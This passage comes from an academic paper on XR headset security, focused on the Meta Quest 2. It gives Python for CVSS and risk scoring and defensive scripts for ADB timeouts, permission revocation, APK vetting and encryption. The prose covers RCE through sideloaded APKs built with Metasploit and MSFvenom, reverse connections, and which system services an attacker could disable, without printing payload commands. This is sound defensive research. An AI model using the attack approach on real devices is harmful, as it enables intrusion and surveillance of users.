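    """Base score for a vector such as 'AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'."""
    m = dict(part.split(":") for part in vector.split("/"))
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    impact = (7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15) if changed else 6.42 * iss
    if impact <= 0:
        return 0.0
    raw = 1.08 * (impact + exploitability) if changed else impact + exploitability
    return roundup(min(raw, 10))


# The Remote Code Execution vector from Scenario 1 yields a base score of 8.8.
print(cvss_base_score("AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # -> 8.8
```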
To address contribution 2, we developed a custom model to quantify the probability of threat occurrence, specifically tailored to VR-related attack scenarios. This model incorporates four key factors: User Behavior Susceptibility (UBS), Vulnerability Exploitation Ease (VEE), System Exposure Level (SEL), and Attack Popularity and Availability (APA). Given the interactive nature of VR environments, the model carefully balances both technical and human factors.
Each factor is scored on a 1–10 scale and assigned a weight between 1 and 10 to reflect its relative importance. Weighting each factor appropriately is crucial, as some factors may be more significant than others in real-world attacks. Table 3 outlines the conditions considered when weighting each factor. The overall likelihood is calculated using the following formula:
Likelihood Score = [(3 × UBS) + (2 × VEE) + (2 × SEL) + (3 × APA)] / 100
where the weights (i.e., 3 for User Behavior Susceptibility, 2 for Vulnerability Exploitation Ease, 2 for System Exposure Level, and 3 for Attack Popularity and Availability) reflect the relative importance of each factor in determining the likelihood of exploitation.
For instance, in Android malware attacks, user behavior (particularly social engineering) is a primary attack vector, leading experts to assign it a higher weight (3) due to its significant influence on exploitation success. Similarly, while zero-day vulnerabilities are rare, publicly available exploits, such as those found on Metasploit or GitHub, increase the probability of attacks, justifying a high weight for Attack Popularity and Availability (3).
On the other hand, System Exposure Level is assigned a weight of 2 because while exposure is important, not all vulnerabilities require external access to be exploited. Some attacks can occur locally, emphasizing that exposure alone is not the sole determinant of an attack’s feasibility.
A likelihood model was developed to reflect the behavioral and technical aspects of XR-specific threats. We assigned higher weights to UBS and APA because social engineering and public exploits were recurring vectors in recent XR and Android-based attack reports [55]. Factors such as SEL and VEE were assigned moderate weights to reflect their influence on feasibility without overwhelming the human-centric threat landscape of XR environments. Using the assigned weights, the likelihood of a threat occurring is calculated and presented in Table 4. Obtaining the likelihood values provides the necessary input to compute the risk score, which is calculated by multiplying the likelihood, impact, and vulnerability. The risk scores for each threat are illustrated in Table 5.
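The likelihood and risk computations described above can be expressed compactly as follows. The factor scores passed to likelihood_score are illustrative values chosen to approximate the 0.79 likelihood reported for Remote Code Execution, and the final line combines the reported likelihood, vulnerability, and impact values for RCE (0.79, 8.8, and 5.9) to reproduce the risk score of approximately 41 presented in Section 5.4.

```python
# Weights from the likelihood model: UBS = 3, VEE = 2, SEL = 2, APA = 3.
WEIGHTS = {"UBS": 3, "VEE": 2, "SEL": 2, "APA": 3}


def likelihood_score(ubs: float, vee: float, sel: float, apa: float) -> float:
    """Weighted likelihood on a 0-1 scale; each factor is scored from 1 to 10."""
    weighted = (WEIGHTS["UBS"] * ubs + WEIGHTS["VEE"] * vee
                + WEIGHTS["SEL"] * sel + WEIGHTS["APA"] * apa)
    return weighted / 100.0


def risk_score(likelihood: float, vulnerability: float, impact: float) -> float:
    """Risk = Likelihood x Vulnerability x Impact (CVSS base and impact scores)."""
    return likelihood * vulnerability * impact


# Hypothetical factor scores giving a likelihood close to the 0.79 reported for RCE.
print(likelihood_score(ubs=9, vee=7, sel=6, apa=9))   # -> 0.80
# Reported RCE values reproduce the risk score of ~41 from Table 6.
print(round(risk_score(0.79, 8.8, 5.9)))              # -> 41
```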

5.3. Risk Tolerance and Severity

Risk tolerance refers to the level of risk an entity is willing to accept or tolerate to achieve its objectives [56]. Establishing a risk tolerance level is vital for VR environments, as it helps determine the severity of the potential threats. A threat scale ranging from low to medium and high is used to assess severity and tolerance levels based on the scores obtained.
We set the scale as follows:
  • ≥30: High
  • 20–29.22: Medium
  • <20: Low
The threats were assigned the following severity levels:
  • Remote Code Execution (RCE): High
  • Social Engineering: High
  • Insecure App Installation: Medium
  • Unauthorized Access and Data Exfiltration: Medium
  • Eavesdropping: Low
  • Surveillance: Low
  • Location Tracking: Low
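A small helper applying the tolerance scale above; the first two scores are the RCE and social-engineering values reported in Section 5.4, while the third is a hypothetical low score.

```python
def severity(risk: float) -> str:
    """Map a computed risk score onto the tolerance scale defined above."""
    if risk >= 30:
        return "High"
    if risk >= 20:
        return "Medium"
    return "Low"


print(severity(41), severity(37), severity(15))  # -> High High Low
```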

5.4. Risk Analysis Results

The risk assessment process was conducted using a scenario-driven methodology, evaluating threats against VR devices with likelihood, vulnerability, and impact metrics. The calculated risk scores based on the previously defined likelihood, vulnerability, and impact components are summarized in Table 6.
Table 6 presents the calculated risk scores, derived by multiplying three components: likelihood, vulnerability, and impact. This computation directly supported the achievement of this study’s third contribution, which involved the development of a structured risk quantification model tailored to XR environments. The results reveal that RCE had the highest score, 41, which results from a high likelihood value of 0.79, a critical vulnerability score of 8.8, and a severe impact rating of 5.9.
This suggests that RCE is not only easy to exploit due to the availability of public tools like Metasploit and MSFvenom but also compromises all three pillars of XR system security: confidentiality, integrity, and availability. The high values for both vulnerability and impact reflect how deeply embedded the exploit is in system permissions and how much control it gives the attacker.
In comparison, social engineering and insecure app installation also exhibit high risk scores of 37 and 30, respectively, largely due to the elevated likelihood and prevalence of user-triggered attack vectors. These threats exploit users’ trust and interactions with immersive environments, making these issues particularly dangerous in XR scenarios where security prompts are easily overlooked. Their impact is substantial, particularly in terms of enabling further problems such as unauthorized access or persistent control.
On the other hand, threats related to privacy, such as eavesdropping, surveillance, and location tracking, were assessed as posing a lower risk, but one that remains significant. Although these threats primarily affect confidentiality, they are less likely to compromise core system functions. However, they pose serious risks to user safety and personal data, particularly when combined with other vectors.
The visual presentations below further illustrate the breakdown of these findings. As shown in Figure 13, the threats were ranked by their computed risk scores. Remote Code Execution (RCE) emerged as the highest-risk scenario due to its strong exploitability and system-level impact and the wide availability of attack tools. Social engineering and insecure app installation followed closely, indicating that user-centric and permission-based attacks pose serious risks in XR environments. Meanwhile, threats such as location tracking and surveillance scored lower but still present meaningful privacy risks, particularly in immersive systems where users are less aware of sensor activity.
As illustrated in Figure 14, Remote Code Execution and social engineering were assigned the highest vulnerability levels (8.8), indicating their ease of exploitation and the public availability of associated tools. These threats also have a substantial impact on system integrity and user trust. In contrast, eavesdropping, surveillance, and location tracking yielded lower impact scores, yet they still raise serious privacy concerns, especially given XR’s continuous data collection and immersive design, which may decrease user awareness.
As shown in Figure 15, most threats are associated with high impact values but relatively lower likelihood scores. This reflects the dependency on user actions such as granting permission or clicking malicious links, especially in XR environments, where immersive experiences can lower security awareness. Remote Code Execution and social engineering stand out due to their combination of a significant impact with a moderately high likelihood, reinforcing their classification as critical risks.

6. Discussion

XR environments heavily rely on underlying technologies, making them susceptible to various technical vulnerabilities. In this Section, we discuss the results of the risk assessment and their impact on XR security, offering a deeper analysis of threat behaviors, system weaknesses, and the human factors that amplify the risks mentioned.
One of the greatest risks identified in this study was RCE via malicious APK delivery. This threat has severe consequences, with the potential to lead to the establishment of a backdoor, enabling attackers to gain persistent access, execute unauthorized commands, and exfiltrate sensitive data. As a result, device integrity can be compromised, as demonstrated by the inception attack simulated by Yang et al. [17], which allowed further system exploitation and, in some cases, led to disrupted availability. RCE significantly impacts the CIA of XR systems. The high risk score reflects the feasibility of this exploit, which requires no physical access and benefits from high attack popularity and availability, meaning that exploit tools are widely accessible.
The success of this attack largely depends on the user’s actions, particularly their willingness to enable developer mode and install an application from an unverified source. Many users are unaware of the risks associated with enabling developer mode or may be easily deceived by a convincing social engineering tactic. While Meta does warn users of the dangers of installing apps from unknown sources, enabling developer mode remains necessary for developers [57]. This highlights how XR platform-level design decisions can create systemic vulnerabilities.
The study also highlights the key role of social engineering in XR security breaches. Social-engineering attacks exploit human psychology to bypass technical barriers, taking advantage of users’ trust in virtual environments and lack of familiarity with XR security threats. Attackers manipulate XR-specific behaviors, such as users’ tendency to trust familiar interfaces or grant permissions under the guise of enhancing their experience. The immersive nature of XR can make users more likely to trust system prompts and grant permissions without proper scrutiny. Additionally, users engaged in immersive experiences are more vulnerable to deceptive phishing tactics, as their focus on the virtual world reduces their ability to critically assess security prompts. The prominence of social engineering as a major attack vector underscores the necessity of prioritizing the consideration of human vulnerabilities when designing security controls for XR environments.
Insecure app installation emerged as a high-risk factor. In the studied scenario, the malicious APK was installed when users enabled or abused permissions to install applications from unknown sources. Many XR users sideload APKs and may unintentionally install malicious applications, potentially establishing a TCP reverse connection, granting attackers unauthorized remote access to the device.
Such unauthorized access compromises confidentiality and privacy, as XR devices store vast quantities of sensitive user data. Unauthorized access and data exfiltration pose a medium-level threat but can serve as a gateway for further exploits. For instance, in Scenario 1, the app_list output (Figure 5) reveals system services that maintain device integrity and security. Attackers could disable services like com.oculus.appsafety, which ensures device security, thereby bypassing security controls. Similarly, attackers could manipulate com.oculus.guardian, which protects users’ physical boundaries, increasing the risk of physical injuries. Furthermore, com.meta.AccountsCenter.pwa and com.oculus.companiondevicemanager could be exploited to bypass authentication mechanisms, forcing unauthorized logins and remotely pairing compromised devices for persistent access. Gaining file system access allows attackers to view, upload, or delete files, leading to potential data theft, app data modifications, and/or the deletion of critical system files, ultimately disrupting a device’s functionality.
While eavesdropping, surveillance, and location tracking do not directly compromise system functionality, they pose serious privacy threats, primarily affecting confidentiality. Although classified as lower risks in this study, these threats still have significant implications for user privacy. For instance, eavesdropping allows attackers to intercept and record real-time conversations, compromising sensitive information [58]. Similarly, surveillance via unauthorized camera access can lead to visual-data breaches, enabling attackers to monitor users’ surroundings without consent.
Location tracking presents another privacy risk, allowing attackers to monitor physical movements and launch targeted social-engineering attacks. Attackers can combine location data with other personal information to create comprehensive user profiles, increasing the risk of stalking, harassment, and physical security violations. The primary vulnerability enabling these attacks is weak permission controls. Many users tend to overlook permission settings, granting unnecessary access to applications. The XR environment amplifies this risk as users are less likely to verify or restrict permissions in immersive scenarios. These privacy threats highlight the need for more stringent permission control mechanisms to mitigate unauthorized data access.

6.1. Analytical Interpretation

The scenarios and their associated risks reveal more than just technical exploitation; they highlight a complex interaction between platform design decisions, user behaviors, and permission systems unique to XR. For instance, RCE exploits were made possible not only by APK sideloading but also by a lack of runtime permission validation and by the user’s trust in immersive prompts. These issues reflect broader design gaps in XR platforms, where immersion tends to lower user vigilance.
The social-engineering attacks demonstrated the vulnerability of XR users to manipulation, particularly when prompts are delivered during immersion, reducing critical evaluation. Similarly, weak permission controls and the lack of persistent indicators for camera, microphone, and location usage reflect system-design oversights that adversaries could exploit for surveillance and location tracking.
Thus, while the technical feasibility of these attacks is significant, the real enabler is the alignment of exploitable system functions with predictable user behaviors in immersive environments. This makes XR platforms particularly vulnerable to low-complexity, high-impact social-engineering and permission-based attacks.

6.2. Methodological Limitations and Future Work

Although this study is grounded in real-world exploit tools and scenarios, its methodology was limited to client-side attacks using a small sample of XR devices, specifically the Meta Quest 2. Broader XR ecosystems such as Microsoft HoloLens, ARKit/ARCore platforms, and multi-user virtual environments remain unexplored. Future work should expand this methodology to include network-layer attacks, malicious augmented reality content injection, adversarial spatial mapping, and AI-driven behavioral exploits. Cross-platform comparisons will also provide insights into architectural weaknesses across XR vendors.
Furthermore, focusing on real-time security enforcement, context-aware permission systems, and intelligent sensor access auditing may increase system resilience. The ethical implications of immersive deception and real-time psychological manipulation [59] also warrant in-depth exploration.

7. Mitigation Strategies

To address the identified security threats in XR environments, this Section outlines mitigation strategies focusing on technical controls, policy enforcement, and user awareness. The proposed measures are intended to reduce attack surfaces, strengthen system security, and enhance user protection against evolving cyber threats in XR ecosystems.
Developer mode exploitation has been demonstrated to be a viable attack vector in previous studies, including the work of Yang et al. [17]. To mitigate this risk, developer mode should be session-based and automatically disabled after a predefined period, reducing prolonged exposure to attacks. In addition, users should receive real-time notifications whenever developer mode is activated or modified, increasing transparency and accountability, and Android Debug Bridge (ADB) connections should be restricted to trusted applications and authenticated users to prevent unauthorized access.
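As an illustration, the following minimal sketch shows how such a session-based timeout could be enforced from an administration host with ADB access to the headset. The timeout value and the reliance on the standard Android adb_enabled setting are assumptions made for illustration only, not a description of any vendor mechanism.

```python
import subprocess
import time

# Illustrative policy value only; a production policy would be enforced on-device by the vendor.
DEV_MODE_TIMEOUT_SECONDS = 30 * 60  # auto-disable developer access after 30 minutes

def adb(*args: str) -> str:
    """Run an adb command against the connected headset and return its trimmed output."""
    result = subprocess.run(["adb", *args], capture_output=True, text=True, check=True)
    return result.stdout.strip()

def developer_access_enabled() -> bool:
    # 'adb_enabled' is the standard Android global setting controlling ADB/debug access.
    return adb("shell", "settings", "get", "global", "adb_enabled") == "1"

def disable_developer_access() -> None:
    # Turning the setting off drops the debug bridge, closing the sideloading and
    # remote-shell attack surface exercised in Scenario 1.
    adb("shell", "settings", "put", "global", "adb_enabled", "0")

if __name__ == "__main__":
    session_start = time.time()
    while developer_access_enabled():
        if time.time() - session_start > DEV_MODE_TIMEOUT_SECONDS:
            disable_developer_access()
            print("Developer access disabled after session timeout.")
            break
        time.sleep(60)  # re-check once per minute
```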
Poor permission control in XR environments allows malicious applications to exploit excessive privileges for unauthorized access. Granular permission controls that let users approve or reject specific rights according to the use case would help address this issue. In addition, real-time permission alerts are needed to notify users whenever an application accesses their microphone, camera, or location data.
Permissions can also be revoked automatically, for example, when an application has not been used for a predetermined period of inactivity, while regular audits of granted permissions can help users review and adjust access settings so that applications do not retain unnecessary permissions that attackers could exploit.
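The sketch below illustrates this revocation policy from an administration host, again assuming ADB access to the headset. The inactivity threshold, the permission list, and the days_idle helper are hypothetical placeholders, since the actual inactivity signal is platform-specific.

```python
import subprocess

# Hypothetical policy values, for illustration only.
INACTIVITY_THRESHOLD_DAYS = 14
SENSITIVE_PERMISSIONS = [
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
    "android.permission.ACCESS_FINE_LOCATION",
]

def adb_shell(command: str) -> str:
    """Run a shell command on the connected headset via ADB and return its output."""
    result = subprocess.run(["adb", "shell", command], capture_output=True, text=True)
    return result.stdout

def third_party_packages() -> list[str]:
    # 'pm list packages -3' lists user-installed (non-system) packages.
    lines = adb_shell("pm list packages -3").splitlines()
    return [line.removeprefix("package:").strip() for line in lines if line.strip()]

def days_idle(package: str) -> int:
    """Placeholder: a real implementation would query platform usage statistics."""
    return 0  # stub value; with 0 days idle, nothing is ever revoked

def revoke_if_idle(package: str) -> None:
    if days_idle(package) < INACTIVITY_THRESHOLD_DAYS:
        return
    for permission in SENSITIVE_PERMISSIONS:
        # 'pm revoke' withdraws a runtime permission; the app must re-request it on next use.
        adb_shell(f"pm revoke {package} {permission}")
        print(f"Revoked {permission} from idle application {package}")

if __name__ == "__main__":
    for pkg in third_party_packages():
        revoke_if_idle(pkg)
```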
Insecure app installation and excessive permissions can introduce vulnerabilities into XR devices. To address this, apps from unknown sources should be automatically scanned for malicious behavior before installation, and sandboxed execution should be enforced for XR applications to prevent unauthorized system modifications.
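A minimal sketch of such pre-installation vetting is shown below, assuming the standard Android aapt tool is available on the analysis host. The permission blocklist and the accept/reject rule are illustrative only; a real scanner would combine static and dynamic analysis.

```python
import subprocess
import sys

# Illustrative blocklist: permissions that warrant review before sideloading onto an XR headset.
HIGH_RISK_PERMISSIONS = {
    "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.REQUEST_INSTALL_PACKAGES",
}

def requested_permissions(apk_path: str) -> set[str]:
    # 'aapt dump permissions' prints the permissions declared in the APK manifest.
    output = subprocess.run(["aapt", "dump", "permissions", apk_path],
                            capture_output=True, text=True, check=True).stdout
    permissions = set()
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("uses-permission:"):
            permissions.add(line.split("'")[1])  # the permission name is quoted in the output
    return permissions

def vet_apk(apk_path: str) -> bool:
    """Return True if the APK passes this (illustrative) pre-install policy."""
    risky = requested_permissions(apk_path) & HIGH_RISK_PERMISSIONS
    if risky:
        print(f"Blocked {apk_path}: requests high-risk permissions {sorted(risky)}")
        return False
    print(f"{apk_path} passed the static permission check.")
    return True

if __name__ == "__main__":
    vet_apk(sys.argv[1])
```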
To address social-engineering attacks, it is essential to create educational initiatives that raise awareness of the unique security and privacy risks associated with XR technologies [60]. Enhanced user awareness training and phishing-resistant security mechanisms, such as interactive tutorials that explain security settings and the implications of granting permissions, can help users make informed decisions [22]. These tutorials should engage users within the immersive environment itself, ensuring they are relevant and easy to understand. Gamification is another promising approach, as it can be a powerful tool for educating users about security risks and best practices [61]. By introducing security tasks and rewards into the XR environment, users can learn to recognize and react to threats in a controlled and entertaining way [62]. Finally, security prompts with clear explanations should be displayed before access to critical XR functions is granted.
To address privacy risks such as eavesdropping, location tracking, and unauthorized surveillance, location-tracking features should require users’ explicit consent for each tracking session, and visual indicators should be displayed whenever the microphone, camera, or motion-tracking functions are in use to enhance user awareness. All voice-, video-, and text-based communications must be encrypted to prevent unauthorized interception.
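As one possible building block, the sketch below applies authenticated encryption (AES-GCM, via the widely used Python cryptography package) to a captured voice or chat payload before transmission. Key exchange and transport are assumed to be handled elsewhere and are outside the scope of this example.

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def encrypt_payload(key: bytes, payload: bytes, context: bytes) -> bytes:
    """Seal a voice/text payload with AES-GCM; the context label is authenticated but not hidden."""
    nonce = os.urandom(12)                       # 96-bit nonce, unique per message
    ciphertext = AESGCM(key).encrypt(nonce, payload, context)
    return nonce + ciphertext                    # prepend the nonce so the receiver can decrypt

def decrypt_payload(key: bytes, blob: bytes, context: bytes) -> bytes:
    nonce, ciphertext = blob[:12], blob[12:]
    return AESGCM(key).decrypt(nonce, ciphertext, context)

if __name__ == "__main__":
    session_key = AESGCM.generate_key(bit_length=256)   # in practice, derived per session
    message = b"voice frame or chat message captured on the headset"
    sealed = encrypt_payload(session_key, message, b"xr-voice-channel")
    assert decrypt_payload(session_key, sealed, b"xr-voice-channel") == message
    print("Round-trip succeeded; intercepted traffic exposes only ciphertext.")
```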

8. Conclusions

The increasing amount of attention paid to the metaverse has accelerated the development and advancement of its underlying technologies, particularly XR [63]. As XR becomes more integral to the metaverse, its rapid evolution and adoption pose unique security challenges that must be carefully assessed and addressed [64]. In this study, we conducted a scenario-driven risk assessment using real-world exploits and a structured likelihood model combined with CVSS scoring to quantify and prioritize threats across XR environments.
The findings confirm that Remote Code Execution, social engineering, and insecure app installation pose the most severe risks. These threats were not only assigned the highest composite risk scores (RCE: 41, social engineering: 37, insecure app installation: 30) but also demonstrated the ability to compromise confidentiality, integrity, and availability. The experimental scenarios confirmed the feasibility of these threats via widely available tools such as MSFvenom and Metasploit, highlighting the real-world relevance of these attack vectors in XR systems.
While lower-level risks such as eavesdropping, surveillance, and location tracking may not directly compromise system functionality, they remain significant due to their impact on user privacy and trust. These threats exploit weak or overly broad permission models common to XR platforms, allowing unauthorized access to sensors without persistent indicators or user awareness. Their classification as lower risk reflects their indirect effect on system integrity but also reinforces the importance of granular permission settings, real-time access notifications, and encrypted communication channels.
Additionally, medium-risk threats, such as unauthorized access and data exfiltration, with a risk score of 25, suggest the need for targeted mitigations including session-based developer mode controls and strengthened authentication. These recommendations are grounded in the scenario findings, where attackers could bypass security boundaries by exploiting system-level services (e.g., com.oculus.guardian), as indicated in Figure 5.
Overall, this research provides a structured framework with which to assess XR-specific threats, one grounded in practical exploitation and quantitative evaluation. This study contributes to the growing body of XR security research by offering empirical insight into the prioritization of threats across technical and human vectors.

Author Contributions

Conceptualization, R.A., D.-M.P. and T.C.B.; methodology, R.A., D.-M.P. and T.C.B.; software, R.A., I.-A.O. and A.R.; validation, T.C.B., A.R. and R.A.; formal analysis, R.A.; investigation, R.A. and I.-A.O.; resources, R.A.; data curation, R.A.; writing—original draft preparation, R.A.; writing—review and editing, D.-M.P., T.C.B., A.R., I.-A.O. and R.A.; visualization, R.A. and I.-A.O.; supervision, D.-M.P. and T.C.B. All authors have read and agreed to the published version of the manuscript.

Funding

This research received no external funding.

Institutional Review Board Statement

Not applicable.

Informed Consent Statement

Not applicable.

Data Availability Statement

The original contributions presented in this study are included in the article. Further inquiries can be directed to the corresponding author.

Conflicts of Interest

The authors declare no conflicts of interest.

References

  1. Kadena, E.; Gupi, M. Human Factors in Cybersecurity: Risks and Impacts. Secur. Sci. J. 2021, 2, 51–64. [Google Scholar] [CrossRef]
  2. Hamayun, M. The Importance of the Human Factor in Cyber Security—Check Point Blog, The Human Factor of Cyber Security. Available online: https://blog.checkpoint.com/security/the-human-factor-of-cyber-security/ (accessed on 27 August 2024).
  3. Pasdar, A.; Koroniotis, N.; Keshk, M.; Moustafa, N.; Tari, Z. Cybersecurity Solutions and Techniques for Internet of Things Integration in Combat Systems. IEEE Trans. Sustain. Comput. 2024, 10, 1–20. [Google Scholar] [CrossRef]
  4. Akhtar, S.; Sheorey, P.A.; Bhattacharya, S.; Ajith, K.V.V. Cyber Security Solutions for Businesses in Financial Services: Challenges, Opportunities, and the Way Forward. Int. J. Bus. Intell. Res. 2021, 12, 82–97. [Google Scholar] [CrossRef]
  5. Qamar, S.; Anwar, Z.; Afzal, M. A systematic threat analysis and defense strategies for the metaverse and extended reality systems. Comput. Secur. 2023, 128, 103127. [Google Scholar] [CrossRef]
  6. Iqbal, M.; Xu, X.; Nallur, V.; Scanlon, M.; Campbell, A. Security, Ethics, and Privacy Issues in the Remote Extended Reality for Education; Springer Nature Singapore Pte Ltd.: Singapore, 2023. [Google Scholar] [CrossRef]
  7. Acheampong, R.; Balan, T.C.; Popovici, D.-M.; Tuyishime, E.; Rekeraho, A.; Voinea, G.D. Balancing usability, user experience, security and privacy in XR systems: A multidimensional approach. Int. J. Inf. Secur. 2025, 24, 112. [Google Scholar] [CrossRef]
  8. Soto Ramos, M.; Acheampong, R.; Popovici, D.-M. A multimodal interaction solutions. “The Way” for Educational Resources. In Proceedings of the International Conference on Virtual Learning—Virtual Learning—Virtual Reality, 18th ed.; The National Institute for Research & Development in Informatics—ICI Bucharest (ICI Publishing House): București, Romania, 2023; pp. 79–90. [Google Scholar] [CrossRef]
  9. Guo, H.; Dai, H.-N.; Luo, X.; Zheng, Z.; Xu, G.; He, F. An Empirical Study on Oculus Virtual Reality Applications: Security and Privacy Perspectives. arXiv 2024, arXiv:2402.13815. [Google Scholar] [CrossRef]
  10. Silva, T.; Paiva, S.; Pinto, P.; Pinto, A. A Survey and Risk Assessment on Virtual and Augmented Reality Cyberattacks. In Proceedings of the 2023 30th International Conference on Systems, Signals and Image Processing (IWSSIP), Nevada, LV, USA, 30 June 2023; IEEE: Piscataway, NJ, USA, 2023; pp. 1–5. [Google Scholar] [CrossRef]
  11. Thorsteinsson, G.; Page, T. Using a virtual reality learning environment (VRLE) to meet future needs of innovative product design education. In Proceedings of the International Conference on Engineering and Product Design Education, Newcastle upon Tyne, UK, 13–14 September 2007; p. 6. [Google Scholar]
  12. Kumar Yekollu, R.; Bhimraj Ghuge, T.; Biradar, S.S.; Haldikar, S.V.; Mohideen, A.K.O.F. Securing the Virtual Realm: Strategies for Cybersecurity in Augmented Reality (AR) and Virtual Reality (VR) Applications. In Proceedings of the 2024 8th International Conference on I-SMAC (IoT in Social, Mobile, Analytics and Cloud) (I-SMAC), Kirtipur, Nepal, 3–5 October 2024; pp. 520–526. [Google Scholar] [CrossRef]
  13. Ramaseri-Chandra, A.N.; Pothana, P. Cybersecurity threats in Virtual Reality Environments: A Literature Review. In Proceedings of the 2024 Cyber Awareness and Research Symposium (CARS), Grand Forks, ND, USA, 28–29 October 2024; IEEE: Piscataway, NJ, USA, 2024; pp. 1–7. [Google Scholar]
  14. Casey, P.; Baggili, I.; Yarramreddy, A. Immersive Virtual Reality Attacks and the Human Joystick. IEEE Trans. Dependable Secur. Comput. 2021, 18, 550–562. [Google Scholar] [CrossRef]
  15. Shi, C.; Xu, X.; Zhang, T.; Walker, P.; Wu, Y.; Liu, J.; Saxena, N.; Chen, Y.; Yu, J. Face-Mic: Inferring live speech and speaker identity via subtle facial dynamics captured by AR/VR motion sensors. In Proceedings of the 27th Annual International Conference on Mobile Computing and Networking, New Orleans, LA, USA, 25–29 October 2021; ACM: New York, NY, USA, 2021; pp. 478–490. [Google Scholar] [CrossRef]
  16. Chukwunonso, A.G.; Njoku, J.N.; Lee, J.-M.; Kim, D.-S. Security in Metaverse: A Closer Look. In Proceedings of the Korean Institute of Communications and Information Sciences, Pyeongchang, Republic of Korea, 3 February 2022; p. 3. [Google Scholar]
  17. Yang, Z.; Li, C.Y.; Bhalla, A.; Zhao, B.Y.; Zheng, H. Inception Attacks: Immersive Hijacking in Virtual Reality Systems. arXiv 2024, arXiv:2403.05721. [Google Scholar]
  18. Shabut, A.M.; Lwin, K.T.; Hossain, M.A. Cyber attacks, countermeasures, and protection schemes—A state of the art survey. In Proceedings of the 2016 10th International Conference on Software, Knowledge, Information Management & Applications (SKIMA), Kuching, Malaysia, 14–16 December 2016; pp. 37–44. [Google Scholar] [CrossRef]
  19. Imperva. 2023-Imperva-Bad-Bot-Report. The Cyber Threat Index, 2023. Available online: https://www.imperva.com/ (accessed on 27 August 2024).
  20. Cyberattacks on Gaming: Why the Risks Are Increasing for Gamers. Available online: https://www.makeuseof.com/cyberattacks-gaming-risks-increasing/ (accessed on 21 March 2024).
  21. Dastgerdy, S. Virtual Reality and Augmented Reality Security: A Reconnaissance and Vulnerability Assessment Approach. arXiv 2024, arXiv:2407.15984. [Google Scholar] [CrossRef]
  22. Rao, P.S.; Krishna, T.G.; Muramalla, V.S.S.R. Next-Gen Cybersecurity for Securing Towards Navigating the Future Guardians of the Digital Realm. Int. J. Progress. Res. Eng. Manag. Sci. 2023, 3, 178–190. [Google Scholar] [CrossRef]
  23. Ogundare, E. Human Factor in Cybersecurity. arXiv 2024, arXiv:2407.15984v1. [Google Scholar]
  24. Lin, J.; Latoschik, M.E. Digital body, identity and privacy in social virtual reality: A systematic review. Front. Virtual Real. 2022, 3, 974652. [Google Scholar] [CrossRef]
  25. Valea, O.; Oprişa, C. Towards Pentesting Automation Using the Metasploit Framework. In Proceedings of the 2020 IEEE 16th International Conference on Intelligent Computer Communication and Processing (ICCP), Cluj-Napoca, Romania, 26–28 August 2020; pp. 171–178. [Google Scholar] [CrossRef]
  26. National Institute of Standards and Technology. Framework for Improving Critical Infrastructure Cybersecurity, Version 1.1; National Institute of Standards and Technology: Gaithersburg, MD, USA, 2018. [Google Scholar] [CrossRef]
  27. Gulhane, A.; Vyas, A.; Mitra, R.; Oruche, R.; Hoefer, G.; Valluripally, S.; Calyam, P.; Hoque, K.A. Security, Privacy and Safety Risk Assessment for Virtual Reality Learning Environment Applications. In Proceedings of the 2019 16th IEEE Annual Consumer Communications & Networking Conference (CCNC), Las Vegas, NV, USA, 4–7 January 2019; IEEE: Piscataway, NJ, USA, 2019; pp. 1–9. [Google Scholar]
  28. King, A.; Kaleem, F.; Rabieh, K. A Survey on Privacy Issues of Augmented Reality Applications. In Proceedings of the 2020 IEEE Conference on Application, Information and Network Security (AINS), Kota Kinabalu, Malaysia, 7–9 December 2020; IEEE: Piscataway, NJ, USA, 2020; pp. 32–40. [Google Scholar] [CrossRef]
  29. Adams, D.; Bah, A.; Barwulor, C. Ethics Emerging: The Story of Privacy and Security Perceptions in Virtual Reality. In Proceedings of the Fourteenth Symposium on Usable Privacy and Security, Baltimore, MD, USA, 12–14 August 2018. [Google Scholar]
  30. Ling, Z.; Li, Z.; Chen, C.; Luo, J.; Yu, W.; Fu, X. I Know What You Enter on Gear VR. In Proceedings of the 2019 IEEE Conference on Communications and Network Security (CNS), Washington, DC, USA, 9–11 September 2019; IEEE: Piscataway, NJ, USA, 2019; pp. 241–249. [Google Scholar] [CrossRef]
  31. Qayyum, A.; Butt, M.A.; Ali, H.; Usman, M.; Halabi, O.; Al-Fuqaha, A.; Abbasi, Q.H.; Imran, M.A.; Qadir, J. Secure and Trustworthy Artificial Intelligence-Extended Reality (AI-XR) for Metaverses. arXiv 2022, arXiv:2210.13289. [Google Scholar] [CrossRef]
  32. Read Akamai Threat Research—Gaming Respawned|Akamai. Available online: https://www.akamai.com/resources/state-of-the-internet/soti-security-gaming-respawned (accessed on 21 March 2024).
  33. Hollerer, S.; Sauter, T.; Kastner, W. Risk Assessments Considering Safety, Security, and Their Interdependencies in OT Environments. In Proceedings of the 17th International Conference on Availability, Reliability and Security, Vienna, Austria, 23–26 August 2022; pp. 1–8. [Google Scholar] [CrossRef]
  34. Parkinson, S.; Ward, P.; Wilson, K.; Miller, J. Cyber Threats Facing Autonomous and Connected Vehicles: Future Challenges. IEEE Trans. Intell. Transp. Syst. 2017, 18, 2898–2915. [Google Scholar] [CrossRef]
  35. Gopal, S.R.K.; Wheelock, J.D.; Saxena, N.; Shukla, D. Hidden Reality: Caution, Your Hand Gesture Inputs in the Immersive Virtual World are Visible to All! In Proceedings of the 32nd USENIX Security Symposium, Anaheim, CA, USA, 9–11 August 2023. [Google Scholar]
  36. Gugenheimer, J.; Tseng, W.-J.; Mhaidli, A.H.; Rixen, J.O.; McGill, M.; Nebeling, M.; Khamis, M.; Schaub, F.; Das, S. Novel Challenges of Safety, Security and Privacy in Extended Reality. In Proceedings of the CHI Conference on Human Factors in Computing Systems Extended Abstracts, New Orleans, LA, USA, 29 April–5 May 2022; ACM: New York, NY, USA, 2022; pp. 1–5. [Google Scholar] [CrossRef]
